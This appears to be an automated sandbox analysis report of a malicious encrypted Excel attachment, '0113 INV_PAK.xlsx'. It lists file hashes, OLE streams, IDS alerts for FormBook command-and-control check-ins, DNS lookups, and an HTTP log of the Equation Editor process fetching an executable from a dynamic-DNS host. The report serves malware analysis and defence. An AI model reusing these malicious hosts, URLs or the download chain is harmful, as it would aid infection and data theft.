                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.................. ... ....@.. .......................`............@.................................d...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........C..$\...............b...........................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....op...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:CDFV2 Encrypted
                                                                                                                                                              Entropy (8bit):7.9966042645036755
                                                                                                                                                              TrID:
                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                              File name:0113 INV_PAK.xlsx
                                                                                                                                                              File size:2298880
                                                                                                                                                              MD5:2fd9077e801ebc26d370c3b6798dd9c4
                                                                                                                                                              SHA1:5638f179b275bc14326c54bb2ffc038975a8288f
                                                                                                                                                              SHA256:1386b172ed5a75548288ebf6277603a5743dfc2cd42d6de3a57ff1418f7c0fb8
                                                                                                                                                              SHA512:399a0fc833f56c23ce849627013ba28b794ea97304949a1edcae0631d8d4dac8bec1077578641411d8939f1127086363e6fb0f5950d3e674d0de9fd6b0cd64dc
                                                                                                                                                              SSDEEP:49152:CHMmsP/MNOTC0Xjb64IX0s63RHGE4V3mkv3lyCO5ORwcOJf:icMc+m+4IX0s+GE4V/v3FMf
                                                                                                                                                              File Content Preview:........................>...................$...................................................................................|.......~...............z.......|.......~...............z.......|.......~...............z......................................

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                              Static OLE Info

                                                                                                                                                              General

                                                                                                                                                              Document Type:OLE
                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                              OLE File "0113 INV_PAK.xlsx"

                                                                                                                                                              Indicators

                                                                                                                                                              Has Summary Info:False
                                                                                                                                                              Application Name:unknown
                                                                                                                                                              Encrypted Document:True
                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                              Contains Workbook/Book Stream:False
                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                              Flash Objects Count:
                                                                                                                                                              Contains VBA Macros:False

                                                                                                                                                              Streams

                                                                                                                                                              Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:64
                                                                                                                                                              Entropy:2.73637206947
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                              Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                              Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:112
                                                                                                                                                              Entropy:2.7597816111
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                              Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                              Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:200
                                                                                                                                                              Entropy:3.13335930328
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                              Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/Version
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:76
                                                                                                                                                              Entropy:2.79079600998
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                              Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                              Stream Path: EncryptedPackage, File Type: data, Stream Size: 2276632
                                                                                                                                                              General
                                                                                                                                                              Stream Path:EncryptedPackage
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:2276632
                                                                                                                                                              Entropy:7.9999064044
                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                              Data ASCII:. . " . . . . . . . . . . s . 2 . . t . \\ F h 0 . . C . | e z . . . B . . . . g . . . . Z 7 . $ M ? h = . r . . . | B . Y . u . . . . | . . . . . . c I . I 2 , . } . A . B R . . . c I . I 2 , . } . A . B R . . . c I . I 2 , . } . A . B R . . . c I . I 2 , . } . A . B R . . . c I . I 2 , . } . A . B R . . . c I . I 2 , . } . A . B R . . . c I . I 2 , . } . A . B R . . . c I . I 2 , . } . A . B R . . . c I . I 2 , . } . A . B R . . . c I . I 2 , . } . A . B R . . . c I . I 2 , . } . A . B R . . . c I . I 2
                                                                                                                                                              Data Raw:0a bd 22 00 00 00 00 00 93 8f 0a 09 b7 73 8b 32 d8 b1 74 09 5c 46 20 68 30 d1 fe 43 f9 7c 65 7a 95 1c da 42 89 a4 97 d9 67 95 c5 1d b2 5a 37 1f 24 4d 3f 68 3d bb 72 f9 dd b4 7c 42 f8 59 82 75 ea fd d4 aa 7c 19 eb d8 d4 8f c0 63 49 0d 49 32 2c af 7d 95 41 c4 42 52 d4 8f c0 63 49 0d 49 32 2c af 7d 95 41 c4 42 52 d4 8f c0 63 49 0d 49 32 2c af 7d 95 41 c4 42 52 d4 8f c0 63 49 0d 49 32
                                                                                                                                                              Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                              General
                                                                                                                                                              Stream Path:EncryptionInfo
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:224
                                                                                                                                                              Entropy:4.5666325917
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . 8 . u . . . . . . C . . . 1 . . . k . . . . . . . . . I # . . . . . . . . U < : . V 1 . . . . D ? . . 8 Y . . . P d . K . R H R ; . .
                                                                                                                                                              Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                              Network Behavior

                                                                                                                                                              Snort IDS Alerts

                                                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                              01/27/21-07:30:04.721498TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916580192.168.2.22103.141.138.125
                                                                                                                                                              01/27/21-07:31:11.466603TCP1201ATTACK-RESPONSES 403 Forbidden804916634.102.136.180192.168.2.22
                                                                                                                                                              01/27/21-07:31:21.841069TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.22208.91.197.91
                                                                                                                                                              01/27/21-07:31:21.841069TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.22208.91.197.91
                                                                                                                                                              01/27/21-07:31:21.841069TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916780192.168.2.22208.91.197.91

                                                                                                                                                              Network Port Distribution

                                                                                                                                                              TCP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jan 27, 2021 07:30:04.499723911 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:04.720243931 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:04.720494986 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:04.721498013 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:04.945147038 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:04.945207119 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:04.945242882 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:04.945281982 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:04.945513964 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:04.947118044 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.167690992 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.167731047 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.167752028 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.167841911 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.167870998 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.167903900 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.167967081 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.168020010 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.168859005 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.168888092 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.168926954 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.168951988 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.389799118 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.389833927 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.389849901 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.389867067 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.389883041 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.389902115 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.389914989 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.389925957 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.389939070 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.389950991 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.389965057 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.389987946 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.390000105 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.390011072 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.390022993 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.390034914 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.390206099 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.390369892 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.392321110 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.610302925 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610347033 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610363960 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610378981 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610400915 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610426903 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610450983 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610471964 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610491991 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610512972 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610527039 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610543013 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610553980 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.610559940 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610580921 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610600948 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610600948 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.610621929 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610636950 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.610641956 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610661983 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610668898 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.610682011 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610702038 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610702038 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.610728025 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610733032 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.610752106 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610760927 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.610771894 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610786915 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.610791922 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.610820055 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.610848904 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.614162922 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.830415964 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830451012 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830463886 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830476999 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830488920 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830501080 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830513954 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830526114 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830538988 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830555916 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830568075 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830640078 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830658913 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830674887 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830692053 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830708027 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830729961 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830746889 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830763102 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830777884 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830786943 CET4916580192.168.2.22103.141.138.125
                                                                                                                                                              Jan 27, 2021 07:30:05.830794096 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830810070 CET8049165103.141.138.125192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:05.830823898 CET4916580192.168.2.22103.141.138.125

                                                                                                                                                              UDP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jan 27, 2021 07:30:04.319606066 CET5219753192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 07:30:04.419282913 CET53521978.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:30:04.419727087 CET5219753192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 07:30:04.480691910 CET53521978.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:31:11.193767071 CET5309953192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 07:31:11.265022039 CET53530998.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:31:21.487876892 CET5283853192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 07:31:21.678929090 CET53528388.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:31:27.072844028 CET6120053192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 07:31:27.145788908 CET53612008.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:31:32.602803946 CET4954853192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 07:31:32.800672054 CET53495488.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:31:38.212694883 CET5562753192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 07:31:38.563221931 CET53556278.8.8.8192.168.2.22
                                                                                                                                                              Jan 27, 2021 07:31:44.057811975 CET5600953192.168.2.228.8.8.8
                                                                                                                                                              Jan 27, 2021 07:31:44.121485949 CET53560098.8.8.8192.168.2.22

                                                                                                                                                              DNS Queries

                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                              Jan 27, 2021 07:30:04.319606066 CET192.168.2.228.8.8.80x7745Standard query (0)sndychnesqudusissnvx.dns.armyA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:30:04.419727087 CET192.168.2.228.8.8.80x7745Standard query (0)sndychnesqudusissnvx.dns.armyA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:11.193767071 CET192.168.2.228.8.8.80x708cStandard query (0)www.inreachpt.comA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:21.487876892 CET192.168.2.228.8.8.80xa14dStandard query (0)www.athleteshive.comA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:27.072844028 CET192.168.2.228.8.8.80xccffStandard query (0)www.calusaptamiami.comA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:32.602803946 CET192.168.2.228.8.8.80x2e78Standard query (0)www.shuhan.designA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:38.212694883 CET192.168.2.228.8.8.80x2f03Standard query (0)www.rentfs.comA (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:44.057811975 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.trijjadigital.comA (IP address)IN (0x0001)

                                                                                                                                                              DNS Answers

                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                              Jan 27, 2021 07:30:04.419282913 CET8.8.8.8192.168.2.220x7745No error (0)sndychnesqudusissnvx.dns.army103.141.138.125A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:30:04.480691910 CET8.8.8.8192.168.2.220x7745No error (0)sndychnesqudusissnvx.dns.army103.141.138.125A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:11.265022039 CET8.8.8.8192.168.2.220x708cNo error (0)www.inreachpt.cominreachpt.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:11.265022039 CET8.8.8.8192.168.2.220x708cNo error (0)inreachpt.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:21.678929090 CET8.8.8.8192.168.2.220xa14dNo error (0)www.athleteshive.com208.91.197.91A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:27.145788908 CET8.8.8.8192.168.2.220xccffNo error (0)www.calusaptamiami.comcalusapta.membershiptoolkit.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:27.145788908 CET8.8.8.8192.168.2.220xccffNo error (0)calusapta.membershiptoolkit.commtk-lb-1470093426.us-west-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:27.145788908 CET8.8.8.8192.168.2.220xccffNo error (0)mtk-lb-1470093426.us-west-2.elb.amazonaws.com44.240.171.172A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:27.145788908 CET8.8.8.8192.168.2.220xccffNo error (0)mtk-lb-1470093426.us-west-2.elb.amazonaws.com44.239.20.8A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:27.145788908 CET8.8.8.8192.168.2.220xccffNo error (0)mtk-lb-1470093426.us-west-2.elb.amazonaws.com35.162.176.29A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:32.800672054 CET8.8.8.8192.168.2.220x2e78No error (0)www.shuhan.designshuhan.designCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:32.800672054 CET8.8.8.8192.168.2.220x2e78No error (0)shuhan.design192.185.35.76A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:38.563221931 CET8.8.8.8192.168.2.220x2f03No error (0)www.rentfs.com154.196.151.25A (IP address)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:44.121485949 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.trijjadigital.comtrijjadigital.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              Jan 27, 2021 07:31:44.121485949 CET8.8.8.8192.168.2.220x3c4eNo error (0)trijjadigital.com166.62.29.42A (IP address)IN (0x0001)

                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                              • sndychnesqudusissnvx.dns.army
                                                                                                                                                              • www.inreachpt.com
                                                                                                                                                              • www.athleteshive.com
                                                                                                                                                              • www.calusaptamiami.com
                                                                                                                                                              • www.shuhan.design
                                                                                                                                                              • www.rentfs.com
                                                                                                                                                              • www.trijjadigital.com

                                                                                                                                                              HTTP Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              0192.168.2.2249165103.141.138.12580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jan 27, 2021 07:30:04.721498013 CET0OUTGET /documengt/svchost.exe HTTP/1.1
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                              Host: sndychnesqudusissnvx.dns.army
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Jan 27, 2021 07:30:04.945147038 CET2INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 27 Jan 2021 06:30:02 GMT
                                                                                                                                                              Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                                                                                                                                                              Last-Modified: Wed, 27 Jan 2021 03:46:13 GMT
                                                                                                                                                              ETag: "df000-5b9d99cd20d8a"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Content-Length: 913408
                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-msdownload
